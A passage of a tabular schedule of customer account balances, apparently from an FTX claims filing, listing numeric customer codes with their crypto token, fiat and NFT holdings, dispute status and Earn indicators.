| 07404565 | | BRZ[1], BTC[.00000536], CUSDT[3], GRT[1], SOL[.00055459], SUSHI[.11752782], TRX[2.00001068], UNI[.00000016], USD[8.13], USDT[1] | | |
| 07404571 | | DOGE[0.53540000], ETH[0], LTC[0], SOL[0], SUSHI[.045075], TRX[0], USD[1.24], USDT[0.88747821] | | |
| 07404572 | | USD[2000.16] | | |
| 07404579 | | USD[0.69] | | |
| 07404585 | | USD[0.00] | | |
| 07404586 | | DOGE[.30916205], GRT[.492], USD[3800.49] | | |
| 07404592 | | USD[9.23] | | |
| 07404595 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
| 07404596 | | BRZ[2], CUSDT[5], DOGE[2589.9784914], GRT[425.82264852], KSHIB[15125.00894424], SHIB[6508558.02968457], TRX[2], USD[0.00] | Yes | |
| 07404604 | | BRZ[1], CUSDT[2], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[0] | | |
| 07404607 | | DOGE[0], LTC[0], PAXG[0], SOL[0.01000000], TRX[0], USD[117.04], USDT[0] | | |
| 07404608 | | DOGE[121.74321883], SUSHI[.54554613], TRX[2], USD[0.22] | | |
| 07404612 | | BRZ[1], BTC[.01676879], CUSDT[2], DOGE[4], ETH[1.2043764], ETHW[1.20385949], GRT[1], SHIB[1], SOL[68.09923381], TRX[3], USD[0.01], USDT[1.09131514] | Yes | |
| 07404614 | | SOL[29.51], USD[0.50] | | |
| 07404615 | | BTC[0], USD[0.00] | | |
| 07404617 | | AAVE[.00009156], BTC[0], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07404619 | | BAT[854.85959184], DAI[0], GRT[0], SOL[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07404620 | | ETH[.231], ETHW[.231], SOL[33.7662], USD[0.00], USDT[.008] | | |
| 07404625 | | CUSDT[1], DOGE[.13718671], USD[100.81] | | |
| 07404641 | | CUSDT[5], DOGE[31.54715367], ETH[.0026928], ETHW[.00266542], SHIB[5515511.01031432], SOL[2.22105588], USD[0.06] | Yes | |
| 07404645 | | USD[0.68] | | |
| 07404648 | | DOGE[1], NFT (389843126457742119/Imola Ticket Stub #666)[1], SHIB[6609106.59278893], TRX[16510.53962338], USD[11.69] | Yes | |
| 07404653 | | CUSDT[1], DOGE[1], SOL[156.48108298], USD[0.00] | | |
| 07404657 | | NFT (325338374595780050/Coachella x FTX Weekend 2 #22133)[1] | | |
| 07404658 | | BTC[.24076503], ETH[12.20383207], ETHW[12.19972493], LTC[.61650464] | Yes | |
| 07404660 | | USD[120.00] | | |
| 07404668 | | CUSDT[3], DOGE[1], USD[0.00] | Yes | |
| 07404669 | | CUSDT[6], DOGE[197.71618821], TRX[2], USD[0.01] | | |
| 07404674 | | USD[0.51] | Yes | |
| 07404676 | | BTC[0.00001317], TRX[.000001], USD[0.01], USDT[0] | | |
| 07404677 | | BAT[0], DOGE[0], SOL[0], SUSHI[0], TRX[2.73191442], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07404678 | | USD[10.00] | | |
| 07404682 | | CUSDT[3], DOGE[0.57515963], NFT (292211692295115428/Bahrain Ticket Stub #1567)[1], NFT (532150744095762388/CryptoAvatar #129)[1], SUSHI[.0005852], TRX[2], USD[8.01] | Yes | |
| 07404685 | | USD[0.00], USDT[0] | | |
| 07404695 | | BAT[1], SOL[714.55607454], TRX[2], USD[0.40], USDT[1] | | |
| 07404701 | | ETH[.00049781], ETHW[.00049781], USD[0.72] | | |
| 07404703 | | BTC[.47777571], USD[94.09] | | |
| 07404715 | | ETH[0], SOL[0], USD[0.00] | | |
| 07404721 | | CUSDT[1], TRX[1439.68549206], USD[0.00] | | |
| 07404722 | | CUSDT[1], DOGE[1], ETH[0.32505306], ETHW[0.32488971], USD[0.00] | Yes | |
| 07404724 | | ALGO[564.85623199], BCH[1.82458122], BTC[.00651216], DOGE[907.95988152], ETH[.09304067], ETHW[.06749844], GRT[1036.33905937], LINK[9.22336827], NFT (289486104914403828/Million Dollar View)[1], NFT (303117392861079202/Summer nights )[1], NFT (305069258726361451/Golden Bull - Rome )[1], NFT (305303797286765918/Another World #6)[1], NFT (335824635522012950/Cooper Landing)[1], NFT (341735691746228763/Dragon Avatar  #21)[1], NFT (377111516420280740/Dragon Avatar  #23)[1], NFT (383877276433629303/Skull Love #21)[1], NFT (392609350130692513/Al-generated landscape #12)[1], NFT (394694086419742985/Alien Women #2)[1], NFT (395517624481648721/Pixel Women)[1], NFT (398370916923729453/Landz #2)[1], NFT (400839615379313295/Z - Town #8)[1], NFT (412406663907017081/Another World #4)[1], NFT (417054665871109209/Landz #3)[1], NFT (442850786009391825/king skeleton #2)[1], NFT (456644771867511154/Alien Women #3)[1], NFT (464942605165677013/Alien Women #6)[1], NFT (479437128151052280/War Wolf)[1], NFT (495594075152069397/Fallen Travelers)[1], NFT (510304690047262239/Love Explosion )[1], NFT (555768921588488906/Landz)[1], NFT (556813196293339093/Pirates....)[1], NFT (571052119150506024/Alien Women #4)[1], NFT (574551997289367870/Another World #3)[1], SHIB[33629054.10052836], USD[0.01], YFI[.71698065] | Yes | |
| 07404725 | | USD[0.00] | | |
| 07404732 | | BF_POINT[200], DOGE[0], SHIB[14954416.76831970], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07404735 | | ETH[.366633], ETHW[.366633], USD[0.23] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07404740 | | AUD[0.00], AVAX[0.00146057], BTC[0.00001158], ETH[0], ETHW[0.00038586], EUR[0.00], GBP[0.67], PAXG[0.00003222], SOL[0], USD[0.00], USDT[0.00565453] | | |
| 07404742 | | BRZ[5], CUSDT[4], DOGE[3], TRX[2], USD[0.01], USDT[1.00000001] | | |
| 07404753 | | TRX[1], USD[0.00] | | |
| 07404754 | | USD[0.24], USDT[0] | Yes | |
| 07404761 | | AVAX[35.79990862], BTC[0.12720218], ETH[0.37560936], ETHW[0.21218729], LINK[362.99616247], SOL[85.99660546], USD[400.45], USDT[0.00000955] | | |
| 07404764 | | BTC[.00003557], DOGE[37.14175228], USD[0.00] | | |
| 07404765 | | BTC[0], CUSDT[4], DOGE[4], TRX[3], USD[0.00] | | |
| 07404767 | | AVAX[14.4915], BTC[0.00002005], ETHW[5.74803511], SOL[.00708], USD[1.09] | | |
| 07404770 | | NFT [5018986494793382192/Entrance Voucher #3605][1], NFT [506392357888461325/Miami Ticket Stub #438][1] | Yes | |
| 07404774 | | BRZ[1], BTC[0], CUSDT[5], DOGE[0], SHIB[398663.42461723], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07404776 | Contingent, Disputed | BTC[0] | | |
| 07404779 | | BRZ[2], BTC[0], CUSDT[8], DOGE[0], ETH[0.63691914], ETHW[0.63691914], SHIB[1], SOL[0], TRX[1], USD[0.00] | | |
| 07404784 | | BRZ[1], CUSDT[2], DOGE[0], ETH[.00000048], ETHW[.00000048], TRX[1], USD[0.00] | | |
| 07404787 | | BRZ[1], USD[0.01] | Yes | |
| 07404792 | | DOGE[11405.22165442], TRX[1], USD[0.00] | | |
| 07404794 | | AVAX[2.9681094], BRZ[1], BTC[.01403396], CUSDT[18], DOGE[4], ETH[.06592877], ETHW[.06592877], LINK[6.98035794], SHIB[22], SOL[.00005156], SUSHI[36.53983556], TRX[8], USD[0.11] | | |
| 07404798 | | SOL[.0055], USD[0.00] | | |
| 07404802 | | CUSDT[1], DOGE[0], TRX[.00164132], USD[0.00] | | |
| 07404804 | | DOGE[34.90634105], USD[-2.00] | | |
| 07404805 | | CUSDT[1], GRT[1], USD[0.01] | | |
| 07404814 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07404818 | | CUSDT[2], TRX[0], USD[0.00], USDT[0] | | |
| 07404825 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07404826 | | BAT[1], CUSDT[9], ETH[.04049066], ETHW[.04049066], TRX[4], USD[0.00], USDT[.00000954] | | |
| 07404828 | | SOL[25.12728402], TRX[1], USD[0.00] | | |
| 07404830 | | USD[0.00], USDT[0] | | |
| 07404831 | | USD[250.00] | | |
| 07404832 | | CUSDT[3], SOL[17.12918199], TRX[1], USD[0.00] | Yes | |
| 07404837 | | USD[17037.16], USDT[0] | Yes | |
| 07404842 | | USD[0.00] | Yes | |
| 07404843 | | CUSDT[5], DOGE[1047.28325366], USD[0.00] | | |
| 07404849 | | AVAX[6.25773088], BRZ[2], CUSDT[2], DOGE[2], SHIB[1], SOL[51.19012995], SUSHI[50.79493478], TRX[9855.22283447], USD[0.00] | | |
| 07404850 | | DOGE[37.84534028], USD[0.00] | | |
| 07404851 | | BRZ[4], CUSDT[3], DOGE[3], ETH[0], GRT[1.00389968], SOL[31.87932071], TRX[2], USD[0.07] | Yes | |
| 07404852 | | ETH[0], ETHW[0], USD[-0.02], USDT[0.25912531] | | |
| 07404870 | | DOGE[1], ETH[2.84017375], ETHW[2.83898086], USD[0.00] | Yes | |
| 07404873 | | USD[0.00] | | |
| 07404877 | | DOGE[0], SOL[0.00000010], TRX[0], USD[0.14] | | |
| 07404879 | | TRX[1], USD[0.01], USDT[0] | | |
| 07404891 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07404897 | | ETH[1.00206], ETHW[1.00206], SOL[111.03510317] | | |
| 07404905 | | BTC[0], ETH[0], USD[0.00] | | |
| 07404907 | | BRZ[4], CUSDT[1], DOGE[3], ETH[.23751737], ETHW[.23731556], TRX[7], USD[0.00] | Yes | |
| 07404911 | | BTC[.00536054], CUSDT[4], DOGE[166.26996125], LTC[.10967317], MATIC[39.11889957], SHIB[144196.10670511], SOL[.02690067], SUSHI[6.20827612], TRX[1], UNI[1.42357692], USD[35.00] | | |
| 07404917 | | CUSDT[4], DOGE[.0005536], LTC[.000072], USD[0.05], USDT[0] | | |
| 07404920 | | USD[0.00], USDT[0] | | |
| 07404921 | | DAI[.02004844], SOL[6.7932], USD[3.00] | | |
| 07404922 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07404924 | | USD[1.70] | | |
| 07404929 | | CUSDT[1], DOGE[35705.97866238], USD[1.10] | Yes | |
| 07404932 | | USD[0.01] | Yes | |
| 07404934 | | LTC[0], SUSHI[0], TRX[.000003], USD[0.01], YFI[0] | | |
| 07404935 | | USD[0.09] | | |
| 07404936 | | BAT[235.35107569], BF_POINT[200], BRZ[317.16670231], CUSDT[2592.24690667], ETH[.32060854], ETHW[.32044153], GRT[144.42616866], SOL[30.2362162], SUSHI[1.01689909], TRX[14500.42180633], UNI[61.16342587], USD[0.45] | Yes | |
| 07404942 | | USD[0.00] | | |
| 07404944 | | BTC[0], DOGE[5.49700000], ETH[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[4.28578358] | | |
| 07404946 | | BRZ[3], CUSDT[3], DOGE[7.30946582], SUSHI[175.68027318], TRX[1], USD[0.00] | Yes | |
| 07404947 | | USD[15.00], USDT[9.94307974] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07404952 | | ETH[.00000001], SOL[0], TRX[.000002], USDT[2.207338] | | |
| 07404953 | | SOL[16.12072766], USD[11.35] | | |
| 07404955 | | BAT[46.0129736], BRZ[3], BTC[.00209446], CUSDT[15], DOGE[32479.82887563], ETH[4.00013281], ETHW[4.41129213], GRT[4.11195341], MATIC[2366.11264429], NFT (329226850781585768/ALPHA:RONIN #540)[1], NFT (330123724185447271/ALPHA:RONIN #1312)[1], NFT (339664261077698026/DRIP NFT)[1], NFT (347069753941845195/DRIP NFT)[1], NFT (353136567397822353/DRIP NFT)[1], NFT (362262791288687184/ALPHA:RONIN #1105)[1], NFT (362775053494586916/DRIP NFT)[1], NFT (368102332067066539/DRIP NFT)[1], NFT (372143382633620475/DRIP NFT)[1], NFT (406434058695993273/ALPHA:RONIN #728)[1], NFT (410139691541740624/ALPHA:RONIN #812)[1], NFT (432285481710223919/ALPHA:RONIN #342)[1], NFT (445286564141298057/8/ALPHA:RONIN #162)[1], NFT (452680986166142598/ALPHA:RONIN #467)[1], NFT (474613684516565929/ALPHA:RONIN #1205)[1], NFT (528697215165321659/DRIP NFT)[1], NFT (553996240364963813/ALPHA:RONIN #510)[1], NFT (559308675470440733/ALPHA:RONIN #197)[1], NFT (559596010977354298/Entrance Voucher #2885)[1], NFT (562607147863298329/ALPHA:RONIN #48)[1], SHIB[1014418 7.56531578], SOL[29.15153471], TRX[8], USD[251.90], USDT[1.10188952] | Yes | |
| 07404956 | | BAT[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], KSHIB[62.06166155], LINK[0], SOL[0], SUSHI[0], TRX[0.00004246], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07404960 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], MATIC[0], SOL[0], USD[2.66], USDT[0.01007129], WBTC[0] | | USD[2.63], USDT[.010065] |
| 07404966 | | BCH[0], BRZ[1], BTC[0], CUSDT[6], DOGE[0], ETH[0.00000001], GBP[0.00], LTC[0], SUSHI[0.00000001], TRX[4], UNI[0], USD[0.00], USDT[1] | | |
| 07404969 | | USD[0.00] | | |
| 07404970 | | DOGE[10313.19315], TRX[302836.81893195], USD[0.00], USDT[0.05635278] | | |
| 07404982 | | BRZ[1], CUSDT[1], DOGE[913.35427212], SOL[47.02572864], TRX[1], USD[26.97] | | |
| 07404983 | | USD[1.37], USDT[0.00000001] | Yes | |
| 07404991 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07404998 | | CUSDT[3], DOGE[100.38989389], GRT[47.61034641], USD[0.00] | Yes | |
| 07405011 | | BTC[0.00041264], DOGE[.865], ETH[0], MATIC[0], SOL[0], USD[0.24] | | |
| 07405013 | | BRZ[4], BTC[0.00000020], CUSDT[7], DOGE[12.86445532], ETH[0.00344898], ETHW[0.00588113], GRT[4489.88583589], LINK[100.69280540], SHIB[39], TRX[14.00025571], USD[1.28] | | |
| 07405016 | | USD[0.00] | | |
| 07405017 | | USD[1.00] | | |
| 07405021 | | BRZ[1], USD[0.00] | | |
| 07405024 | | DOGE[3462.07814388], TRX[1], UNI[3.93355708], USD[0.00] | | |
| 07405025 | | USD[0.00] | | |
| 07405035 | | NFT (524839136200261432/Humpty Dumpty #1377)[1] | | |
| 07405037 | | LINK[.066], NFT (297725591114456331/Reflector #43)[1], NFT (441405311754115557/Golden Hill #509)[1], NFT (509241195059769479/Ferris From Afar #338)[1], NFT (539389709836292061/Vintage Sahara #359)[1], SOL[.004], UNI[.018], USD[0.41] | | |
| 07405040 | | USD[100.00] | | |
| 07405041 | | DOGE[1], GRT[1], SOL[1], USD[0.00], USDT[1] | | |
| 07405046 | | DOGE[0], USD[0.01] | | |
| 07405048 | | CUSDT[2], DOGE[1.05878237], TRX[1], USD[0.00] | | |
| 07405049 | | BAT[1], BRZ[1], CUSDT[4], DOGE[.67744299], TRX[22.13783899], USD[0.00] | | |
| 07405050 | | CUSDT[39.32542692], TRX[2], USD[0.05], USDT[1] | | |
| 07405053 | | BTC[0.00009960], USD[0.01] | | |
| 07405054 | | BAT[8540.67355714], USD[0.00] | | |
| 07405058 | | CUSDT[1], DOGE[385.03016959], TRX[79.34295779], USD[10.00] | | |
| 07405066 | | CUSDT[1], DOGE[3555.3584893]2], SOL[3.4818954], USD[0.00] | Yes | |
| 07405068 | | ETH[.00073942], ETHW[.00073942], USD[0.00] | | |
| 07405072 | | BCH[0], DOGE[1], LTC[0], TRX[1], USD[0.00] | | |
| 07405073 | | BTC[0.00740412], DOGE[1155.18827433], ETH[.03798863], ETHW[.03798863], PAXG[.46356132], SHIB[1], USD[2.95], USDT[0] | | |
| 07405078 | | DAI[0], DOGE[1], SOL[0], USD[0.00] | Yes | |
| 07405079 | | CUSDT[1], DOGE[201.26680952], USD[0.00] | | |
| 07405080 | | BAT[1.01655549], BTC[.00488392], CUSDT[1], DOGE[26718.9111271], GRT[92.61531491], SOL[0.45721169], TRX[3], USD[0.26], USDT[0.00046480] | Yes | |
| 07405081 | | BRZ[1], DOGE[2], GRT[1], TRX[1], USD[0.01] | Yes | |
| 07405082 | | BTC[.00021796], CUSDT[1], DOGE[96.03156873], ETH[.0028686], ETHW[.0028686], SUSHI[.60165917], USD[0.00] | | |
| 07405084 | | BRZ[1], SHIB[5], TRX[2], USD[6.75], USDT[0] | Yes | |
| 07405097 | | BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07405098 | | BAT[3.70510762], BTC[.02450131], CUSDT[1], DOGE[1], MATIC[153.7495492], SOL[4.45445745], USD[0.00] | Yes | |
| 07405100 | | BTC[.0017936] | Yes | |
| 07405109 | | BCH[.00144739], BTC[.00003726], DOGE[24.3843127], ETH[.00051197], ETHW[.00051197], USD[1.75], YFI[.0002262] | | |
| 07405112 | | ETHW[.363555], USD[8143.72] | | |
| 07405120 | | BRZ[3], CUSDT[3], DOGE[1170.19310737], PAXG[.16819576], SOL[64.22708497], TRX[1], USD[1060.46] | Yes | |
| 07405122 | | BRZ[2], CUSDT[15], TRX[6], USD[0.00] | Yes | |
| 07405124 | | USD[10.00] | | |
| 07405128 | Contingent, Disputed | DOGE[693.27495569], USD[0.00] | | |
| 07405130 | | BTC[.00008804], USD[0.00] | | |
| 07405134 | | USD[89.75] | | |
| 07405138 | | DOGE[2], USD[0.00] | | |
| 07405141 | | ALGO[.36151], BTC[0], ETH[.00039144], ETHW[.00039144], LINK[.087043], MATIC[4.65516], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07405145 | | BTC[0], DOGE[0], ETH[0.11068336], ETHW[0.11068336], TRX[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07405151 | | BAT[1], BRZ[8.04915005], CUSDT[109.61587799], DOGE[14.05794114], ETH[0], GRT[1.00074003], TRX[16.01030578], USD[0.00] | | |
| 07405152 | | DOGE[0.83282001], USD[0.00] | Yes | |
| 07405154 | | USD[0.00] | | |
| 07405158 | | ETH[0], LINK[0], SOL[1], USD[0.00] | | |
| 07405164 | | DOGE[10] | | |
| 07405165 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07405167 | | AVAX[0], BAT[0], BRZ[3], BTC[0], DAI[0], DOGE[1], ETH[1], GRT[1], LTC[0.02106966], MATIC[0], NEAR[0], NFT (324371367124549433/Imola Ticket Stub #525)[1], SHIB[23], SOL[1], TRX[1], UNI[0], USD[40.91], USDT[0.00000001] | Yes | |
| 07405168 | | DOGE[1], USD[0.00] | | |
| 07405169 | | BAT[3.28702105], BRZ[1], BTC[0], CUSDT[2], DOGE[0], GRT[3.18193247], LINK[1.10625082], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07405170 | | NFT (559268637229021688/Australia Ticket Stub #1052)[1] | | |
| 07405171 | | ETH[.00084193], ETHW[.00064592], NFT (390693263801796160/Saudi Arabia Ticket Stub #1795)[1], SOL[.00498], TRX[.000002], USD[0.00] | Yes | |
| 07405183 | | DOGE[1], USD[0.00] | | |
| 07405187 | | USD[0.00] | | |
| 07405194 | | DOGE[479.076], USD[0.06] | | |
| 07405195 | | LTC[.009], SOL[30.876], USDT[6.5681714] | | |
| 07405200 | | BTC[.00043998], CUSDT[1], DOGE[67.64699034], ETH[.00440805], ETHW[.00440805], USD[0.00] | | |
| 07405203 | | BRZ[1], BTC[.03511895], CUSDT[1], ETH[.55], ETHW[.55], LINK[744.823], USD[1500.00] | | |
| 07405207 | | BRZ[1], CUSDT[1], DOGE[2], ETH[.50862071], ETHW[.50862071], GRT[1], LINK[23.50739158], TRX[18270.05095878], USD[2500.00] | | |
| 07405209 | | BTC[.00213064], CUSDT[2], DOGE[452.1463881], USD[0.00] | Yes | |
| 07405212 | | DOGE[6813.71214352], TRX[1], USD[91.29] | | |
| 07405214 | | BAT[2.10357884], BRZ[1], CUSDT[7], DOGE[0], TRX[2], USD[0.00] | Yes | |
| 07405228 | | BTC[.00003698] | | |
| 07405235 | | USD[9.00] | | |
| 07405237 | | BTC[0], USD[0.00] | | |
| 07405241 | | BAT[2.07475414], GRT[2.03563768], MATIC[.01291101], SHIB[882.67222021], TRX[5], USD[0.22], USDT[1.07070196] | Yes | |
| 07405245 | | BRZ[2], CUSDT[3], DOGE[5], GRT[2.00105965], TRX[2], USD[19.76] | Yes | |
| 07405248 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07405258 | | LTC[0], USD[0.27] | | |
| 07405260 | | BAT[3], BRZ[4], BTC[.07544941], CUSDT[6], DOGE[28640.46017403], GRT[2], LTC[4.27511698], SUSHI[26.92883654], TRX[12516.38473082], UNI[16.93799908], USD[0.25], USDT[1] | | |
| 07405261 | | BAT[1.00730915], DOGE[3], GRT[1.0037367], SHIB[2], TRX[2], USD[0.09], USDT[1.0734062] | Yes | |
| 07405264 | | SHIB[1], USD[0.01], USDT[0.00000001] | | |
| 07405266 | | ETHW[.00002152], USD[10.07], USDT[0] | Yes | |
| 07405267 | | USD[0.00] | | |
| 07405269 | | BTC[0.00007158] | | |
| 07405271 | | AVAX[0.27117782], BTC[0.00291413], ETH[0.00136039], ETHW[0.00136182], LTC[.01318565], SOL[1.34576629], SUSHI[5.68505824], USD[389.07], USDT[0.00423182] | | |
| 07405272 | | DOGE[.00005465], SHIB[1], USD[256.20] | Yes | |
| 07405273 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07405283 | | BAT[1.0165555], BRZ[4], BTC[0.08348763], CUSDT[4], DOGE[4.02183096], ETH[.93252996], ETHW[.93212983], GRT[1], LINK[7.3980844], SHIB[1], SOL[4.40411275], TRX[13.41384423], USD[27.16], USDT[1.09795747] | Yes | |
| 07405295 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07405296 | | USD[0.01] | | |
| 07405301 | Contingent, Unliquidated | ALGO[29.45979780], AVAX[1.07598252], BTC[0], ETH[0.26810971], ETHW[0], MATIC[0], NFT (327276752522144369/Entrance Voucher #2002)[1], USD[0.00] | Yes | |
| 07405313 | | CUSDT[4], DOGE[1], USD[74.34] | | |
| 07405320 | | BTC[.0024975], ETH[.02075434], ETHW[.02075434], USD[0.00] | | |
| 07405324 | | USD[0.00] | | |
| 07405330 | | CUSDT[1], TRX[767.56335429], USD[0.00] | | |
| 07405332 | | ETH[.00000001], ETHW[.00000001], USD[0.00] | Yes | |
| 07405339 | Contingent, Unliquidated | ALGO[0], BTC[0], ETH[0], ETHW[0], GRT[0], MATIC[0], NEAR[0], NFT (413773006746749105/Voxel Animals #32)[1], NFT (562328403888566107/Bahrain Ticket Stub #1229)[1], SHIB[2], SOL[0], TRX[0.00004400], USD[0.00], USDT[100] | Yes | |
| 07405342 | | BTC[0.00000244], LINK[.0273], SOL[.032], USDT[3.1086384] | | |
| 07405345 | | USD[0.77] | | |
| 07405352 | | BRZ[7], CUSDT[31], GRT[3], LINK[.17333412], LTC[.08429386], TRX[25], USD[0.00], USDT[2] | | |
| 07405358 | | USD[0.00] | | |
| 07405361 | | ETH[0], USD[0.00] | | |
| 07405362 | | DOGE[2.21049002], USD[0.01] | | |
| 07405372 | | BAT[.73974874], BRZ[1], CUSDT[1], DOGE[.17946769], TRX[3], USD[0.60] | | |
| 07405376 | | CUSDT[23], GRT[.00003695], SHIB[79051.3833992], TRX[3], USD[0.70] | | |
| 07405382 | | MATIC[0], SOL[0], USD[0.00] | | |
| 07405386 | | CUSDT[2], DOGE[7], TRX[4], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07405389 | | CUSDT[4], DOGE[1535.97256293], NFT (328578146146506383/Coachella x FTX Weekend 2 #8015)[1], SOL[82.24061685], TRX[2], UNI[60.47119762], USD[33.38] | Yes | |
| 07405391 | | ETH[.00060347], ETHW[.00060347], LTC[.0012359], TRX[.34], USD[0.00] | | |
| 07405394 | | BRZ[2], CUSDT[2], ETH[0], USD[0.00] | Yes | |
| 07405397 | | AAVE[3.67537870], BAT[0], BCH[0], BRZ[0], BTC[2], CAD[0.00], CUSDT[0], DOGE[1000.22848154], EUR[0.00], GBP[0.00], GRT[0], KSHIB[0], LINK[0], LTC[2.00932604], MATIC[0], NFT (513860696835376062/#1804)[1], SGD[0.00], SHIB[3], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07405401 | | BRZ[3], CUSDT[1], DOGE[2], SOL[8.41818693], TRX[2], USD[0.05] | Yes | |
| 07405404 | | BAT[5.45419216], BRZ[3], BTC[0.00000217], CUSDT[5], DOGE[5.02887312], ETH[.00000142], ETHW[.00000142], GRT[5.22502737], SOL[47.07745984], TRX[5], UNI[1.08043305], USD[0.00], USDT[2.19804878] | Yes | |
| 07405405 | | CUSDT[3], DOGE[1], TRX[.00028648], USD[0.01] | | |
| 07405413 | | BTC[0], SOL[0], USD[0.04] | | |
| 07405417 | | CUSDT[3], TRX[2], USD[0.00] | | |
| 07405421 | | TRX[257.84515489] | | |
| 07405422 | | BTC[.00003423], DOGE[39.11206118], ETH[.00050664], ETHW[.00050664], LTC[.00429974], USD[0.00] | Yes | |
| 07405428 | | BTC[.41890861], ETH[17.9670418], ETHW[15.93542298], NFT (526346096555432331/Coachella x FTX Weekend 1 #17255)[1], SHIB[4], SOL[33.21074916], USD[-89.77] | Yes | |
| 07405432 | | TRX[1], USD[0.00] | | |
| 07405444 | | USD[0.00] | | |
| 07405446 | | USD[12.40] | Yes | |
| 07405460 | | DOGE[3.996], NFT (296177927288586328/3D SOLDIER #1328)[1], NFT (466540825511814916/1375)[1], NFT (514457350093124890/Eitbit Ape #3437)[1], SOL[.08], USD[0.11] | | |
| 07405464 | | USD[0.05], USDT[0] | | |
| 07405491 | | BTC[0], LINK[0] | | |
| 07405495 | | ETH[.00052840], ETHW[0.00052840], USDT[.579735] | | |
| 07405499 | | CUSDT[378.7694002], DOGE[160.9596997], TRX[196.17791825], USD[0.00] | | |
| 07405500 | | BAT[.99783411], BTC[.00038953], CUSDT[2], DOGE[.00002447], ETH[.01197986], ETHW[.01197986], USD[0.54], USDT[.99480502] | | |
| 07405501 | | SHIB[77.05722326], USD[0.00], USDT[0] | | |
| 07405506 | | BTC[.0024875], DOGE[2], ETH[.06978868], ETHW[.06978868], USD[0.00] | | |
| 07405508 | | USD[0.00] | | |
| 07405512 | | AVAX[0.00339730], BTC[0.00003695], DOGE[0.39720000], ETH[0.00073319], ETHW[0.00073319], GRT[.523], KSHIB[.985], LINK[.05112], MATIC[.9877766], SOL[0.00385715], USD[-0.22], USDT[0.00000001], YFI[.00003167] | | |
| 07405519 | | BAT[.196], BTC[.07561347], CUSDT[.344], DOGE[.936], ETH[2.80498786], ETHW[.000812], LINK[16.94826405], NFT (466886719981822493/Australia Ticket Stub #1607)[1], SOL[15539.25], USDT[.00000008] | Yes | |
| 07405525 | | BTC[0], DOGE[0], ETH[0.00150910], ETHW[0.00150910], SOL[0] | | |
| 07405526 | | USD[0.00] | | |
| 07405531 | | BAT[1], DOGE[1], SOL[0] | | |
| 07405535 | | BTC[.00173502], CUSDT[1], USD[0.00] | | |
| 07405538 | | USD[0.00] | | |
| 07405539 | | BAT[92.78349939], BCH[.16327655], CUSDT[10], DOGE[760.04913824], LTC[.31415317], SOL[14.02345001], TRX[515.94751721], UNI[3.74648288], USD[0.00] | | |
| 07405543 | | BCH[.0283333], BRZ[3], BTC[.00344239], CUSDT[28], DOGE[11645.47306691], ETH[.06780465], ETHW[.06780465], LINK[1.08866527], SHIB[568828.2138794], TRX[5], USD[1.00], USDT[1.98980899] | | |
| 07405547 | | BAT[3.996], USD[0.59] | | |
| 07405562 | | BCH[.21090959], BRZ[1], BTC[.00374494], DOGE[2], GRT[132.53214295], TRX[1], USD[0.00] | | |
| 07405566 | | USD[0.00] | | |
| 07405572 | | BTC[0], ETHW[4.65575000], USD[0.00] | | |
| 07405576 | | USD[0.00] | | |
| 07405590 | | CUSDT[3], DOGE[4442.81582582], SOL[11.11697538], TRX[4450.30144483], USD[10.54] | Yes | |
| 07405593 | | USD[0.00] | | |
| 07405596 | | ETH[0], ETHW[0], SOL[0], TRX[.123], USD[3.76] | | |
| 07405597 | | BCH[0], BTC[0], EUR[0.00], GBP[0.00], GRT[0], SGD[0.00], USD[10.00], USDT[0] | | |
| 07405600 | | LTC[7.03], USD[0.93] | | |
| 07405603 | | DOGE[0], ETH[0.02530315], ETHW[0.02530315], SOL[6.08331591], SUSHI[3.22731268], USD[0.00] | | |
| 07405604 | | BTC[.00100005], USD[0.00], USDT[0.00000014] | | |
| 07405606 | | BCH[0], BTC[0.00001957], GRT[.02650246], USD[0.00], USDT[1.96644990] | | |
| 07405610 | | DOGE[0], ETH[0], KSHIB[0], MATIC[0], USD[0.01] | | |
| 07405614 | | USD[1.83] | | |
| 07405620 | | BTC[.00184849], CUSDT[1], DOGE[1], ETH[0.08817656], ETHW[0.08714661], USD[0.00] | Yes | |
| 07405625 | | NFT (329529985113093097/Fancy Frenchies #1676)[1], NFT (423757186979029480/SolPanda #7189)[1], NFT (473924358953405447/Entrance Voucher #4241)[1], NFT (493721651990911274/NGF #305)[1], SOL.89799748], USD[0.00] | | |
